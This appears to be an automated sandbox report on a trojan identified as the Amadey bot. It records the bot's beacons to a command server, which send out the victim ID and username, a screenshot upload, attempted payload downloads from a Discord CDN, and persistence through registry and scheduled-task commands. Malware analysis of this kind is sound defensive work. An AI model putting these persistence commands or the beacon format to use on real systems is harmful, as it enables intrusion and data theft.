                          Nov 12, 2021 22:23:40.169699907 CET5941OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:40.196660995 CET5941INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:40 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          99192.168.2.449884178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:40.337696075 CET5942OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:40.362768888 CET5942INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:40 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0
                          Nov 12, 2021 22:23:40.371305943 CET5942OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:40.371372938 CET5943OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:40.371558905 CET5953OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:40.371644020 CET5955OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:40.394174099 CET5961OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:40.394314051 CET5966OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:40.394326925 CET5970OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:23:40.394337893 CET5971OUTData Raw: ce 8a f4 54 fe 47 a1 a6 98 18 52 e5 60 a4 88 80 a5 a7 79 6c 3b 52 60 8a 2c 55 c4 c5 28 a2 97 b5 02 0a 5a 29 69 88 4a 5a 29 45 31 05 25 3a 80 29 88 40 29 71 4b 45 31 5c 4c 52 81 4b 8a 31 40 06 29 71 46 29 71 4c 42 52 8a 52 28 02 98 83 14 01 45 2d
                          Data Ascii: TGR`yl;R`,U(Z)iJZ)E1%:)@)qKE1\LRK1@)qF)qLBRR(E-(:RZJQMQKH))%-JZ(J*RbRQNNQi(NRiE-Q!K)jbpHTbT-"'OZ(0idB:sWNrE$gyl:6
                          Nov 12, 2021 22:23:40.394371986 CET5977OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:23:40.394403934 CET5982OUTData Raw: 1d c8 50 67 31 ec 90 15 65 23 95 c0 3f 74 0e 46 7d eb 95 8f 52 bf 8a dd ed e3 bd b9 48 5d 76 bc 6b 2b 05 61 e8 46 70 45 74 47 0d 2b dd b2 25 88 8d ac 91 56 92 8a 2b b4 e4 14 51 45 14 c0 2b e9 3f 83 cc bf f0 85 6d c8 dc 26 04 8f 63 1a 7f 81 af 9b
                          Data Ascii: Pg1e#?tF}RH]vk+aFpEtG+%V+QE+?m&c+oK>\Xr;+c*G:5)vRK[_f}+/5KHlb}(z9rZa{6>(Ucw5<OAK')uU+/ts`
                          Nov 12, 2021 22:23:40.416973114 CET5987OUTData Raw: 83 14 62 81 45 30 b8 53 85 36 94 1a 04 28 eb 4e 1d e9 b4 b4 d0 85 a2 8a 5a 64 8b 8a 4c 52 81 4a 06 29 d8 06 e2 8a 53 49 40 20 a2 92 8a 40 14 b4 52 1a 00 5a 51 40 a2 98 0b 4b 49 4a 29 88 5a 33 49 45 08 43 b3 40 eb 40 a3 35 40 3a 8a 6e 68 14 13 61
                          Data Ascii: bE0S6(NZdLRJ)SI@ @RZQ@KIJ)Z3IEC@@5@:nhaii(0RRZJZhLS@C:)BSiEQ,uQNuQ#<*1OH<RMU:uM~itj-f8dvjM3N8h<8isLlJ8Pi.h0Pib@iA
                          Nov 12, 2021 22:23:40.465370893 CET6050INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:40 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          HTTPS Proxied Packets

                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.2.449785162.159.129.233443C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          2021-11-12 21:23:07 UTC0OUTGET /attachments/878034206570209333/908810887417176084/vms.exe HTTP/1.1
                          Host: cdn.discordapp.com
                          Connection: Keep-Alive
                          2021-11-12 21:23:08 UTC0INHTTP/1.1 403 Forbidden
                          Date: Fri, 12 Nov 2021 21:23:08 GMT
                          Content-Type: application/xml; charset=UTF-8
                          Content-Length: 223
                          Connection: close
                          CF-Ray: 6ad2d1d6dd0a4a67-FRA
                          Cache-Control: private, max-age=0
                          Expires: Fri, 12 Nov 2021 21:23:08 GMT
                          Vary: Accept-Encoding
                          CF-Cache-Status: MISS
                          Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                          X-GUploader-UploadID: ADPycduOQ2nv5Veqkgd42QiqIN1sIXdDYGJaK0wdLV8urQNgSpDr69pR3XIAio1f1sDT9Al4rmK8RALe4q8xWISXyFWgSRzLkg
                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q%2FjU4Rea82v5xuYBKbz9MaCUJDcXw9Db8KegYBDPCbxZJb4DNC3pcuTEPmFF8DSyE4GjfahPmjnL5v9DsCEZQxtIP7%2BSQVzbWHaB%2B0QLIBIIuXnipLT8sfK8xIktf89J1y3hFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          2021-11-12 21:23:08 UTC1INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 41 63 63 65 73 73 44 65 6e 69 65 64 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 41 6e 6f 6e 79 6d 6f 75 73 20 63 61 6c 6c 65 72 20 64 6f 65 73 20 6e 6f 74 20 68 61 76 65 20 73 74 6f 72 61 67 65 2e 6f 62 6a 65 63 74 73 2e 67 65 74 20 61 63 63 65 73 73 20 74 6f 20 74 68 65 20 47 6f 6f 67 6c 65 20 43 6c 6f 75 64 20 53 74 6f 72 61 67 65 20 6f 62 6a 65 63 74 2e 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                          Data Ascii: <?xml version='1.0' encoding='UTF-8'?><Error><Code>AccessDenied</Code><Message>Access denied.</Message><Details>Anonymous caller does not have storage.objects.get access to the Google Cloud Storage object.</Details></Error>


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          1192.168.2.449800162.159.129.233443C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          2021-11-12 21:23:18 UTC1OUTGET /attachments/878034206570209333/908810886561534042/slhost.exe HTTP/1.1
                          Host: cdn.discordapp.com
                          Connection: Keep-Alive
                          2021-11-12 21:23:19 UTC1INHTTP/1.1 403 Forbidden
                          Date: Fri, 12 Nov 2021 21:23:19 GMT
                          Content-Type: application/xml; charset=UTF-8
                          Content-Length: 223
                          Connection: close
                          CF-Ray: 6ad2d21b2ab93140-FRA
                          Cache-Control: private, max-age=0
                          Expires: Fri, 12 Nov 2021 21:23:19 GMT
                          Vary: Accept-Encoding
                          CF-Cache-Status: MISS
                          Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                          X-GUploader-UploadID: ADPycdvjQNyKaBXxiqCCobPtgG1KSRPDCVkVQPgNMJ5ySD5KjTZi-_A2_BiphWIxXC8S3a66EUhiAneSexuIfCuRJBI
                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=keBV%2FCaatl1Isn0iloP08mxEsHAEsq6K0ajLic9XxHzBLDIBEDyhPhdOpctfhCe8O4VasRHLKe5D8QyIoiC61vEukE98minHtoN7xkp7Wt1eqnamo6RZxU7VpltHRKfEeLHxOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          2021-11-12 21:23:19 UTC2INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 41 63 63 65 73 73 44 65 6e 69 65 64 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 41 6e 6f 6e 79 6d 6f 75 73 20 63 61 6c 6c 65 72 20 64 6f 65 73 20 6e 6f 74 20 68 61 76 65 20 73 74 6f 72 61 67 65 2e 6f 62 6a 65 63 74 73 2e 67 65 74 20 61 63 63 65 73 73 20 74 6f 20 74 68 65 20 47 6f 6f 67 6c 65 20 43 6c 6f 75 64 20 53 74 6f 72 61 67 65 20 6f 62 6a 65 63 74 2e 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                          Data Ascii: <?xml version='1.0' encoding='UTF-8'?><Error><Code>AccessDenied</Code><Message>Access denied.</Message><Details>Anonymous caller does not have storage.objects.get access to the Google Cloud Storage object.</Details></Error>


                          Code Manipulations

                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          Analysis Process: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exe PID: 1744 Parent PID: 5236

                          General

                          Start time:22:22:52
                          Start date:12/11/2021
                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen15.38099.19640.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen15.38099.19640.exe"
                          Imagebase:0xbb0000
                          File size:2588967 bytes
                          MD5 hash:34CCA2013EB9B2941A65971919BF356D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low

                          Chronological Activities

                          Analysis Process: rnyuf.exe PID: 5824 Parent PID: 1744

                          General

                          Start time:22:22:59
                          Start date:12/11/2021
                          Path:C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe"
                          Imagebase:0x1250000
                          File size:2588967 bytes
                          MD5 hash:34CCA2013EB9B2941A65971919BF356D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000003.00000002.946875767.00000000048F5000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000003.00000003.882463196.000000000488C000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000003.00000002.943681294.0000000000E23000.00000004.00000020.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000003.00000002.943646127.0000000000DE9000.00000004.00000020.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000003.00000003.882574918.00000000048C6000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000003.00000003.882522004.00000000048B3000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000003.00000003.810169410.0000000000E50000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000003.00000003.744803770.0000000000E50000.00000004.00000001.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000003.00000002.946613784.0000000004860000.00000004.00000001.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 79%, ReversingLabs
                          Reputation:low

                          Chronological Activities

                          Analysis Process: cmd.exe PID: 6636 Parent PID: 5824

                          General

                          Start time:22:23:05
                          Start date:12/11/2021
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\
                          Imagebase:0x11d0000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: conhost.exe PID: 6512 Parent PID: 6636

                          General

                          Start time:22:23:05
                          Start date:12/11/2021
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff724c50000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: schtasks.exe PID: 4460 Parent PID: 5824

                          General

                          Start time:22:23:05
                          Start date:12/11/2021
                          Path:C:\Windows\SysWOW64\schtasks.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe" /F
                          Imagebase:0x1310000
                          File size:185856 bytes
                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: reg.exe PID: 6120 Parent PID: 6636

                          General

                          Start time:22:23:05
                          Start date:12/11/2021
                          Path:C:\Windows\SysWOW64\reg.exe
                          Wow64 process (32bit):true
                          Commandline:REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\
                          Imagebase:0xa80000
                          File size:59392 bytes
                          MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: conhost.exe PID: 6964 Parent PID: 4460

                          General

                          Start time:22:23:06
                          Start date:12/11/2021
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff724c50000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: rnyuf.exe PID: 5908 Parent PID: 968

                          General

                          Start time:22:23:08
                          Start date:12/11/2021
                          Path:C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          Imagebase:0x1250000
                          File size:2588967 bytes
                          MD5 hash:34CCA2013EB9B2941A65971919BF356D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low

                          Chronological Activities

                          Analysis Process: rnyuf.exe PID: 1808 Parent PID: 968

                          General

                          Start time:22:24:01
                          Start date:12/11/2021
                          Path:C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          Imagebase:0x1250000
                          File size:2588967 bytes
                          MD5 hash:34CCA2013EB9B2941A65971919BF356D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low

                          Chronological Activities

                          Disassembly

                          Code Analysis

                          Reset < >

                            Analysis Process: SecuriteInfo.com.Trojan.Siggen15.38099.19640.exe PID: 1744 Parent PID: 5236 SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeCOMMON

                            Executed Functions

                            Function 00D077B0, Relevance: 1.3, APIs: 1, Instructions: 24sleepCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.677809934.0000000000BEA000.00000040.00020000.sdmp, Offset: 00BB0000, based on PE: true
                            • Associated: 00000000.00000002.677676691.0000000000BB0000.00000002.00020000.sdmp Download File
                            • Associated: 00000000.00000002.677691755.0000000000BB1000.00000020.00020000.sdmp Download File
                            • Associated: 00000000.00000002.677751099.0000000000BD7000.00000040.00020000.sdmp Download File
                            • Associated: 00000000.00000002.677769096.0000000000BE0000.00000004.00020000.sdmp Download File
                            • Associated: 00000000.00000002.677778617.0000000000BE5000.00000002.00020000.sdmp Download File
                            • Associated: 00000000.00000002.677788867.0000000000BE8000.00000004.00020000.sdmp Download File
                            • Associated: 00000000.00000002.677797745.0000000000BE9000.00000002.00020000.sdmp Download File
                            • Associated: 00000000.00000002.678160745.0000000000D80000.00000040.00020000.sdmp Download File
                            • Associated: 00000000.00000002.678174412.0000000000D82000.00000040.00020000.sdmp Download File
                            • Associated: 00000000.00000002.678190737.0000000000D86000.00000040.00020000.sdmp Download File
                            • Associated: 00000000.00000002.678211855.0000000000D88000.00000040.00020000.sdmp Download File
                            • Associated: 00000000.00000002.678238590.0000000000D8A000.00000040.00020000.sdmp Download File
                            • Associated: 00000000.00000002.678256325.0000000000D8C000.00000040.00020000.sdmp Download File
                            • Associated: 00000000.00000002.678273528.0000000000D8E000.00000040.00020000.sdmp Download File
                            • Associated: 00000000.00000002.678289045.0000000000D90000.00000040.00020000.sdmp Download File
                            • Associated: 00000000.00000002.678299626.0000000000D9D000.00000040.00020000.sdmp Download File
                            • Associated: 00000000.00000002.678308754.0000000000DA7000.00000040.00020000.sdmp Download File
                            • Associated: 00000000.00000002.678314360.0000000000DA9000.00000040.00020000.sdmp Download File
                            • Associated: 00000000.00000002.678330349.0000000000DAE000.00000040.00020000.sdmp Download File
                            • Associated: 00000000.00000002.678343355.0000000000DB0000.00000040.00020000.sdmp Download File
                            • Associated: 00000000.00000002.678355757.0000000000DB2000.00000040.00020000.sdmp Download File
                            • Associated: 00000000.00000002.678364136.0000000000DB4000.00000040.00020000.sdmp Download File
                            • Associated: 00000000.00000002.678377227.0000000000DB8000.00000040.00020000.sdmp Download File
                            • Associated: 00000000.00000002.678396952.0000000000DBA000.00000040.00020000.sdmp Download File
                            • Associated: 00000000.00000002.678409741.0000000000DBC000.00000040.00020000.sdmp Download File
                            • Associated: 00000000.00000002.678443732.0000000000DCA000.00000040.00020000.sdmp Download File
                            • Associated: 00000000.00000002.678460303.0000000000DD2000.00000040.00020000.sdmp Download File
                            • Associated: 00000000.00000002.678469345.0000000000DD4000.00000040.00020000.sdmp Download File
                            • Associated: 00000000.00000002.678476816.0000000000DD6000.00000040.00020000.sdmp Download File
                            • Associated: 00000000.00000002.678489457.0000000000DD8000.00000040.00020000.sdmp Download File
                            • Associated: 00000000.00000002.678499748.0000000000DDA000.00000040.00020000.sdmp Download File
                            • Associated: 00000000.00000002.678505744.0000000000DDC000.00000040.00020000.sdmp Download File
                            • Associated: 00000000.00000002.678511204.0000000000DDE000.00000040.00020000.sdmp Download File
                            • Associated: 00000000.00000002.678540255.0000000000E07000.00000040.00020000.sdmp Download File
                            • Associated: 00000000.00000002.678548098.0000000000E0E000.00000040.00020000.sdmp Download File
                            • Associated: 00000000.00000002.678956387.0000000000FD2000.00000020.00020000.sdmp Download File
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: c6ca1e440214ae8678fb7d5d608053b0d13aaa11066205566f8201567b02fa5f
                            • Instruction ID: 6e17213e6e01b3bf8d0bf5f7cd84ee11be9d64a64dbf07f93d602977b5cc210a
                            • Opcode Fuzzy Hash: c6ca1e440214ae8678fb7d5d608053b0d13aaa11066205566f8201567b02fa5f
                            • Instruction Fuzzy Hash: 7EE04FB361E70CDAC7003E2A99C5678BAE4FA01754FB1057FD5C702745DE72A440B593
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Analysis Process: rnyuf.exe PID: 5824 Parent PID: 1744 rnyuf.exeCOMMON

                            Executed Functions

                            Function 01251DA0, Relevance: 21.2, APIs: 14, Instructions: 157memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetUserNameW.ADVAPI32(00000000,?), ref: 01251DCA
                            • GetProcessHeap.KERNEL32(00000008,?), ref: 01251DDF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 01251DE2
                            • GetUserNameW.ADVAPI32(00000000,?), ref: 01251DF0
                            • GetProcessHeap.KERNEL32(00000008,?), ref: 01251E1E
                            • RtlAllocateHeap.NTDLL(00000000), ref: 01251E21
                            • GetProcessHeap.KERNEL32(00000008,?), ref: 01251E31
                            • RtlAllocateHeap.NTDLL(00000000), ref: 01251E34
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 01251F02
                            • HeapFree.KERNEL32(00000000), ref: 01251F0B
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01251F10
                            • HeapFree.KERNEL32(00000000), ref: 01251F13
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 01251F1A
                            • HeapFree.KERNEL32(00000000), ref: 01251F1D
                            Memory Dump Source
                            • Source File: 00000003.00000002.943799563.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                            • Associated: 00000003.00000002.943789512.0000000001250000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943825611.0000000001277000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943839345.0000000001280000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943854454.0000000001283000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943875599.0000000001285000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943891078.0000000001288000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943904070.0000000001289000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943917656.000000000128A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944130647.0000000001420000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944141105.0000000001422000.00000040.00020000.sdmp Download File
